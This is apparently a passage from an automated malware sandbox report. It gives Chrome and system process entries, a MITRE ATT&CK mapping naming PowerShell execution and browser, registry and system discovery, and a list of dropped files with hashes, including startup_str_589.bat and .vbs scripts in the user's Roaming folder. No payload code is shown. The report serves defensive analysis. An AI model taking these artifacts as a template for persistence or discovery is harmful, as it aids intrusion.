  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5492,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5472 /prefetch:8
  2⤵
  PID:5136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5852,i,1132985917713566125,9467987328607662358,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=5240 /prefetch:8
  2⤵
  PID:5856

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3876

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\4445a203-12a1-4803-b3c0-a2a7e5f59ab2.tmp

Filesize
9KB

MD5
d1115e37ea88728e4025430a7563ec90

SHA1
88096404fdff6718e7188297da6ce3091a55503d

SHA256
bd7f79e033ecdd213be1abb144401086ff1ae6ccebd65d82e93ba94997add47f

SHA512
678639e197acdafebac660e1f01bc100559a16390620709b8597e1f667b4b13e5d24e51133512762fba9a02f916aa18c591b2e424cce1e8ea5f6008bf8c02f9a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
13a6e2d912fcf321210872442c4d3d50

SHA1
2d8427b4a44b915231825ac9864daf2092ee3aa4

SHA256
b35f21aff4b9c08c324d4f1d4cc29916f1607a51d6f678da1deda6f5602b84c9

SHA512
731bdf980084faf59a2271d6864b2c7b63d687952c82fbc5bf30f873afb1ca72baf8d2546f7f2fa7b73e8b01a6a5dcdb39d5c995da93d01e9616c237a8c13aa4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00002c

Filesize
25KB

MD5
3663069479015650d0846a3cdd49888e

SHA1
a6215df3e60a8c546d077a1fe32bddfd59095285

SHA256
622e986737ab05dc235708168dd91e349c3daf7156c3ea6c3113707c624d65b7

SHA512
bb82c91bb0270b058421f22b62a3dd622850b25955a3245c95ac5d721b8bd93cf6ab971f5078db1a1b1d1a7378c8a575bbfefca497e15e1d973680ffe0b595e4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
432B

MD5
a03eb359633e6106e1985510f62bfe92

SHA1
9060c1ced64feca4f6fc6185079ccb89b742c160

SHA256
474630895fa14a55ec7573b859c881d3dfb13945cf387853681c25b148b61a6a

SHA512
d3573402433c247856f5ddd63bf5da1572a993e22899edaca4d7daff3a735c560afaeab6ebf50d4144e35e532a6c410704b8b8a58deab5366689043902a72428

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
6f81f37cb9b11f1e9631ac4ee9597fef

SHA1
71b50ec9be2bde1035c50b0eb126d032e9f5f928

SHA256
43470b2d5533ea66b19b18082d0ee0b678abd4505c11183cd85607f8c21daafe

SHA512
1bb9ff2cc0e7c5fc3737bcedf52c206703acc6504c3c77c49597f44eadb4e3d6698efe02cb0e193540d65c166408bdb138ad158177d84335770e8aa1cf91fd5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
adfa5c4a3fc6dfedbf86ba55ff80f351

SHA1
0351380caafd743008d3af299a42b9d90d551179

SHA256
33d3928ab0dd356b46d46c16ecfd085bdfaa0db2318c261dd0bd18260921e580

SHA512
b55ef1783f4a497997b50e896552bb2b4699996d4c9801ed2c1021fad3c5c734d6534df798317cb0479c556b3270faf466a785a05a39fd6d4267ce9c766ad81d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
df52fff709c7e1eed5ba5f4a681b47af

SHA1
eef59ecf8d22bf84d6b59248ddbf33e8d3bcfc90

SHA256
bf2aeea0dc15eb11afaf3d2278937b8e7e5ccbae8024eee64de873980d478cea

SHA512
68a87079d5baf6488571abc6ba8a6cd02e1287cb1ee45d0b70efccc541d4b5822eb29c46dff760ce2f6ea2540d8830afc226e6a776226daa1c4343cfe2a8a706

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
d319fde9d49e3441a4e3e964f3442358

SHA1
b67de599a4482c537ff0b0b37a1f7964e6c071a6

SHA256
d9387fe9fafd6314c95927b67b9eda81371e7b7dc698739737bc25714e3b2ee1

SHA512
03713b435cf10357d147aeb0cd90ee097e3fcea229cdc3384423c220c5a13826b0ec48e7e8cefbfc828b4e39e1ef3fd5311e9bd051a1472d647c844b8536c985

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
fd93d3500ff11332ca3b6f762639ddbc

SHA1
101c1d9afc0665de0e1b9e4b3214c08e5ce75916

SHA256
c6654273d1222955a38301ac447b189aa6235e647a217cdd1eb5ab450485fe44

SHA512
a38928c14b3bd72743662acf6b507af3f4368fcd5db2a4b5072023bcb30b8753478631c1ebba2deea70946c3ee3db6ffd66702657ccecf5e45e3e9a32abe1cc4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ea9d9a7be9b5faf8a476cc3697564183

SHA1
7cd1718f51263073c9b1ad83368ffa29bdd74022

SHA256
16ea1407f0a4912e813418183f01c5832adae1fa1e74ca5b1ea451ec4f2a427f

SHA512
2b8c595c7b593cc681e0a2ec3ed22c13b45b33636094b62965e397bf13bb147f94b42234c8f0d44a88fd67c2d2df4572a7036cd22778739d071d9c6b9535d8c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a7f38b027f797485a0809e446fa9cd14

SHA1
a715b671ac2df87c2c35749ed7b36d1a159a31ae

SHA256
e4cc03bd0ef22ce6239ec173578d47fdd7dcc36d74dc02b5be8e0b8db26f9c94

SHA512
44007e2c3fa091a0147819119f9450f751b6acd791fc912ab7d8fffa812813422219f359d6dca674ddcde07e409524e702305351f237f9ab520909370b42d139

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
42e4f0ea306533b4eedfa3862c316fb9

SHA1
9a6d7a5ddd2709d06cc59ad84f24056e46405a5b

SHA256
05728b73fed55fc889f560ff38fcd3cccd1a002a4d308090dedd52e25efa7ee5

SHA512
e116c74744c8006add7a22e1d9e5c12df412916652d049f5974bff4e3dcba74d5bd53866a19a030505a743223f27531b6d7e04c02182756cc026ceec25201f2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
05c890b750ed2c2c02c0a45dbc6b98ae

SHA1
26a9671be01256ee3cbe0a9508f78787b0c389ff

SHA256
e4fc8f37d6dc6d426971734578fe89145177554a5227dffe77970b71a0837480

SHA512
77d4398ac62643292ea09713a2ce312d6840eb6c6f08a6fdb1120f102974e417c8233f67e8e6103e4a28d71f35880fcc85dab6309ff3216cabd7382d43ecb91a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
c8ba774a6702c1714a1de28819652a6f

SHA1
72d3f42404446cc590bdd479428df3b4fa6d50a3

SHA256
ab1d69aeb476eaac50e4923297f3cf3fc2a0cf48f8020d246247bd1fa4ed3e6b

SHA512
15a62e19263f1254c9d431def03373627a29fc38076a8530c47e219228288463a338d50864490b721d528693af333cffdcc19969ad0fbe9248a131ae8415de96

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
454384bccf6a02231ec07c208aa4b061

SHA1
58557cbe0f329a402a7321a4ab13e0018451dcea

SHA256
8cb71e221d05d2821ae42163c46015410f1bdea1671eeef83312c57113ebb7f2

SHA512
d6ae789c09f0fdeb0306e673a13c551f5bfb2b519f6ea844bcac76b14a33a974afc9708aafa81df2229b049cc8e1ca51d339deba8d3d9377f44a3007d9be8f02

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
244KB

MD5
4f02a00a670a563818486dd45ecc27b7

SHA1
1d2a99c191fa538f5ceb4439e62420ce675a652c

SHA256
c599d5f19453eee9143f070530aa85c9aff7ea28bb5f07246fa0ff8845d2aeaf

SHA512
e8ba8e501ccdcad66a85a6d163701d94ad6e83a6dfa58bec03fbec81ee4cdccfa8add8b3ebce03ea2b46782ae6554a4ef3d243b81a1e95130c61e0744dfa2e6f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
244KB

MD5
315fe8b1595d738d5cc6068167b27097

SHA1
6e29302d2f03b4399424ecb32742aff72f2449b4

SHA256
9dccd6efc231634aaca3ac44bf39c3029a54023d453682b576c191df72139523

SHA512
73af090ec0e9ff4ccefeb19f61b7c5b71fd0c49f8a7c384d96d9760e3caa24cce8ad68dfc733eb551a97c16d3df754973dcb65cf63eea64af4cc5c70a3842222

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
244KB

MD5
39a48b6f5c4a06d0c0dce2e64aca4ff0

SHA1
bacc15f6119025743b715143fb41c01329654828

SHA256
bbe5f7734cd0b625e824ad0ce23954c276291c00ccb8e60ece86a822f17dd412

SHA512
8c4e24d5a78436bd15058da1aa4a2c073e04a44a44851b536f5d293f523209b14528ac8897d60f578fa78cffea7ee56fd994d457750c9b52794db00028cf5927

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a414997f05985d8fedd15f885e3b1a64

SHA1
6a6f1e28878f3300e0521f64821afbe426f91c00

SHA256
e8281c11bf8e659a149824661c403ff338912e6021a6e8808aa0785c79149933

SHA512
92246120149fbf278146d84bf2c5452d96f598f1f1401dae9439fb2e38da41b7223bc2f9d2ee7dd3b1d8f24a3b841fb70c2c5dc9e550879b6347d08285f7f63d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ffw3j0mo.yqu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3856_1187124551\34fc2583-fe17-4cc5-967c-8387acb6fb27.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir3856_1187124551\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_589.bat

Filesize
327KB

MD5
d0eef460c098ddfab73bffe09b5576f1

SHA1
72a9d083d85037abf060c027ceb2f4c7d83b8d42

SHA256
94bf91b3fb8d81ca10883351d514dd89c9f953771ec90a2c3571e586c0ece07a

SHA512
eaf4b8a20787685ac516f8c8fa27052df7e8100180cdbb16fdbc1dcdc33ede7623ed1ce1abbd24146bc2dc63c4e55fb36957dc731b005d71fd781e1a1b72e8d3

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_589.vbs

Filesize
115B

MD5
eab5a30bde975f8651c2527b0ece35e2

SHA1
c8d0027fb4520a9589ccc7c2ad11aeab043a9bcc

SHA256
c49741dfd5e1280f1034ee5d418ab2bf980cd23049582e83d6a0703a8e26b2dd

SHA512
14b6d7b44b6a946c4384fb5aa5decccd27d9a11c8cae7492b8f77c340feda7aaea89c3c28e9253f14dd0bb964234182926f3c40066b64d56aedc26a4708abab5

Download Submit
memory/5280-49-0x0000026A6E830000-0x0000026A6E84A000-memory.dmp

Filesize
104KB

Download
memory/5720-13-0x000001FDA25F0000-0x000001FDA25F8000-memory.dmp

Filesize
32KB

Download
memory/5720-0-0x00007FFF3D533000-0x00007FFF3D535000-memory.dmp

Filesize
8KB

Download
memory/5720-12-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5720-11-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5720-14-0x000001FDA2890000-0x000001FDA28D0000-memory.dmp

Filesize
256KB

Download
memory/5720-9-0x000001FDA2600000-0x000001FDA2622000-memory.dmp

Filesize
136KB

Download
memory/5720-10-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5720-39-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5720-51-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5720-50-0x00007FFF3D533000-0x00007FFF3D535000-memory.dmp

Filesize
8KB

Download
memory/5748-22-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5748-30-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5748-21-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5748-27-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download
memory/5748-26-0x00007FFF3D530000-0x00007FFF3DFF2000-memory.dmp

Filesize
10.8MB

Download